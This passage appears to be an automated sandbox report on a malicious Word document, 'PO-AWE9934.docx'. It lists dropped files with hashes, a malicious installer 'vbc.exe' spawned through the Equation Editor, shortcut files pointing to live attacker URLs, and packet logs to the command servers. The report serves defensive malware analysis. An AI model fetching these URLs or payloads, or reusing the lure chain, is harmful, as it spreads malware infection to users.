SHA-256:	3D26F4B34A8FF3A34960AFAA8B32D1D6E767A8E2D62263EF774C14A01CA4E4AF
SHA-512:	5B02C329DCEF2BBB4ABCD83DD107EBA0337AE6282851E33685FBBDDF6599772E3413DEFB3A0630B7BD90AF05D861C45F6A4147B86807B5B9549E4A35FE35A87B
Malicious:	false
Preview:	L..................F.... ...x.?...x.?......\|...b(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S ....&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.b(..<T). .PO-AWE~1.DOC..L.......S ..S ..........................P.O.-.A.W.E.9.9.3.4...d.o.c.x.......y...............-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\PO-AWE9934.docx.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.A.W.E.9.9.3.4...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700..........D_....3N...W...9..g............[D_....3N...W...9.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	113
Entropy (8bit):	5.109415799785531
Encrypted:	false
SSDEEP:	3:bDuMJlFeW4Nb0kXJiKcMjomxW+IwcMjov:bCOAVXJiyesy
MD5:	77C78F035BA60E2755A6DB0329BBE22A
SHA1:	390244AE7071D02A188A73B391DA329B7D4AAECD
SHA-256:	4EC855E097187FE94AE81B377FE518FCFF4BD6EADD81984DC69110D44D28BF20
SHA-512:	BA3490E488E1E7A27560CD895AEE925141B87A3D37C834AA386AD0FA9D342A202AD2BB27DC67E631AA7E18D766E9A674722B3F7D20A56DA05673567C4D2519E8
Malicious:	false
Preview:	[folders]..Templates.LNK=0..x.url=0..invoice on 107.172.93.32.url=0..PO-AWE9934.LNK=0..[misc]..PO-AWE9934.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\invoice on 107.172.93.32.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://107.172.93.32/invoice/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.694551758782525
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/G4303XTn:HRYFVm/x4Tn
MD5:	28CBF3C459A7537D13B3B62806D777A1
SHA1:	AE90E0A1262A95C08931ECDF21D3E49D83A2480D
SHA-256:	F9779F8EBA286B70D49E23EB2044FC43DF268A291D4E373912F6626901D52018
SHA-512:	5F0FE83447DACB6E813CE95BF1D66CF5AAF54A5056F2F964BF2BFFC999E7568CF91134296F7FAA4BD22D531A939C3B9C5763B9A91B0E94E2B3E56765FD578387
Malicious:	false
Preview:	[InternetShortcut]..URL=http://107.172.93.32/invoice/..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\x.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<https://onebztip.club/index.php/x>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.58761979586071
Encrypted:	false
SSDEEP:	3:HRAbABGQYm2fqiSherhHGy:HRYFVm4qiSc9HGy
MD5:	0C1720CE77D7C0CEE677679898F353BD
SHA1:	A4FCE20000A3B61180A0E0B303568B392E69F794
SHA-256:	6ADAF18CA9EB4EE0E6D3616EC15AA4CE721118FC1E467335A9AE4132961BAA78
SHA-512:	B92DC323011F0A7BD0DB513734D37F32421F7BD16B6897650B71A41B04BA2786CFF84718D849D9EEAEEBF34254EABED5AA95027E3CC729976799504B46D3BDA4
Malicious:	false
Preview:	[InternetShortcut]..URL=https://onebztip.club/index.php/x..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyDFH5UKycWT5yAi/lln:vdsCkWtgZ2YAyll
MD5:	6525B5171CE36A6D7EDB3E4DFD5CB579
SHA1:	70AFC3864539BCF8F1C4CD336F6096534A6268FA
SHA-256:	617E1415F4483DAE29072F8E5A042E9EB3446F53F9AC2F26180AECD1D93151CF
SHA-512:	700AEAE11F026EDE01A59B5CC1166D041E1B100E91F84F984D072CDB154251AD15A11C629B8CD7314CB0B2FF8669C3C52EB592020FBA2502CB35BDE6D1EA8322
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\Desktop\~$-AWE9934.docx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.5038355507075254
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyDFH5UKycWT5yAi/lln:vdsCkWtgZ2YAyll
MD5:	6525B5171CE36A6D7EDB3E4DFD5CB579
SHA1:	70AFC3864539BCF8F1C4CD336F6096534A6268FA
SHA-256:	617E1415F4483DAE29072F8E5A042E9EB3446F53F9AC2F26180AECD1D93151CF
SHA-512:	700AEAE11F026EDE01A59B5CC1166D041E1B100E91F84F984D072CDB154251AD15A11C629B8CD7314CB0B2FF8669C3C52EB592020FBA2502CB35BDE6D1EA8322
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\Public\vbc.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	166200
Entropy (8bit):	7.481059066220283
Encrypted:	false
SSDEEP:	3072:cbG7N2kDTHUpou0lvStHlquLNLbzKhBvOQsn7DdTAk5RmIdaDm2ghplP:cbE/HUMFSeK+hYQsn7CXIoDyhpl
MD5:	38034F18AF511C3B04B25170735E8B8E
SHA1:	797252E9139D3D46825440335437AD9D538F6B5B
SHA-256:	7BABDD2C7D3752B7B48729110F0AB94DE7CF74C478B7E1EA7A71A468748E70C0
SHA-512:	DA2CE49E148BC8877D391316D785A067083EBDF0884B9389F2E3DB6B71F6E3269FED55D39A1A4557DB1E628316ABF50E520594D8B5A416C7535003F963D7038C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.................................f>....@..........................................................t..h............................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Microsoft Word 2007+
Entropy (8bit):	6.893943848384407
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	PO-AWE9934.docx
File size:	10338
MD5:	41d90bec5e345b3f4a7086158e236730
SHA1:	5a179b748a9523ac4cd1b4010f294e5497b5329e
SHA256:	76772145ed4ca48917df45363d450652cba0605b307d85937166c3042ea85609
SHA512:	4a092dbb1c31bef282aed624a949417ff7fc91a5f1282b1634e60b16cc0b9d8235a70a4425b09e7caf9fc59cdd1c0c13275a194617d0fd85dfc16a046a8af4e4
SSDEEP:	192:ScIMmtPQagTG/b+V6AOThilHPzZmxe3oR:SPXHb+V6AOFidAxyc
File Content Preview:	PK..........!....7f... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 28, 2022 11:26:02.420488119 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:02.420547962 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:02.420738935 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:02.437130928 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:02.437180042 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:02.787071943 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:02.787225008 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:02.804686069 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:02.804734945 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:02.805175066 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:02.805273056 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.064635992 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.105885983 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:03.241719007 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:03.241889954 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:03.241961002 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:03.242011070 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.242036104 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:03.242058992 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.242080927 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:03.242104053 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.242136002 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.251043081 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.251072884 CET	443	49167	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:03.251123905 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:03.251168966 CET	49167	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:08.468506098 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:08.468573093 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:08.468682051 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:08.469750881 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:08.469783068 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:08.805818081 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:08.805996895 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:08.816767931 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:08.816807032 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:08.817150116 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:08.830090046 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:08.873893976 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:09.140436888 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:09.140531063 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:09.140821934 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:09.141731024 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:09.141773939 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:09.141792059 CET	49168	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:09.141813993 CET	443	49168	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.234926939 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.234977961 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.235096931 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.237531900 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.237571955 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.577054024 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.577229023 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.591711998 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.591747999 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.592344999 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.625550985 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.665878057 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.914859056 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.914905071 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.914973021 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.914994955 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.915009975 CET	443	49169	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:13.915132999 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.915431976 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.915452957 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:13.916357994 CET	49169	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:14.955002069 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:14.955044985 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:14.955136061 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:14.955959082 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:14.955971956 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.291141987 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.291241884 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.303850889 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.303890944 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.304285049 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.305634022 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.345868111 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.629754066 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.629791975 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.629820108 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.629879951 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.629879951 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.629905939 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.629942894 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.630399942 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.649068117 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.649107933 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:15.649126053 CET	49170	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:15.649132967 CET	443	49170	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:17.701762915 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:17.701802015 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:17.701879025 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:17.702502012 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:17.702527046 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.065798044 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.066011906 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.078265905 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.078299046 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.079022884 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.080656052 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.121875048 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.425693035 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.425776958 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.425880909 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.425934076 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.425951004 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.425966978 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.425995111 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.426058054 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.426764965 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.427292109 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.427309990 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.427325010 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.427330017 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.427340984 CET	49171	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.427345991 CET	443	49171	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.467778921 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.467835903 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.467905998 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.468555927 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.468580961 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.803440094 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.803615093 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.804179907 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.804210901 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:18.812181950 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:18.812200069 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:19.143256903 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:19.143392086 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:19.143537998 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:19.145977974 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:19.145997047 CET	443	49172	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:19.146049023 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:19.146094084 CET	49172	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:19.200978994 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.344793081 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.344944954 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.345607996 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.489567041 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489625931 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489659071 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489692926 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489721060 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489753008 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489758015 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.489789009 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489794016 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.489815950 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489826918 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.489867926 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.489872932 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489917994 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.489926100 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.489968061 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.548233032 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.632489920 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.632527113 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.632553101 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.632560015 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.632580042 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.632594109 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.632599115 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.632602930 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:19.632611990 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:19.632642031 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:20.096774101 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.096833944 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.096987963 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.098400116 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.098418951 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.432390928 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.432668924 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.433557034 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.433587074 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.439127922 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.439172029 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.767622948 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.767702103 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.767819881 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.767848969 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.768126011 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.768148899 CET	443	49174	66.29.141.207	192.168.2.22
Jan 28, 2022 11:26:20.768183947 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.768197060 CET	49174	443	192.168.2.22	66.29.141.207
Jan 28, 2022 11:26:20.769046068 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:20.914331913 CET	80	49173	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:20.914577961 CET	49173	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.102451086 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.244749069 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.244927883 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.245330095 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.395608902 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395648003 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395662069 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395674944 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395690918 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395704985 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395724058 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395745993 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395765066 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395782948 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.395814896 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.395847082 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.395850897 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.485809088 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538079023 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538120031 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538147926 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538172960 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538196087 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538220882 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538239002 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538264990 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538269043 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538273096 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538275957 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538300991 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538315058 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538325071 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538350105 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538351059 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538373947 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538392067 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538393021 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538420916 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538431883 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538439035 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538446903 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538475037 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538476944 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538497925 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538497925 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538508892 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538523912 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538539886 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538551092 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538574934 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538578987 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538602114 CET	80	49175	107.172.93.32	192.168.2.22
Jan 28, 2022 11:26:23.538611889 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538614988 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.538642883 CET	49175	80	192.168.2.22	107.172.93.32
Jan 28, 2022 11:26:23.539696932 CET	49175	80	192.168.2.22	107.172.93.32
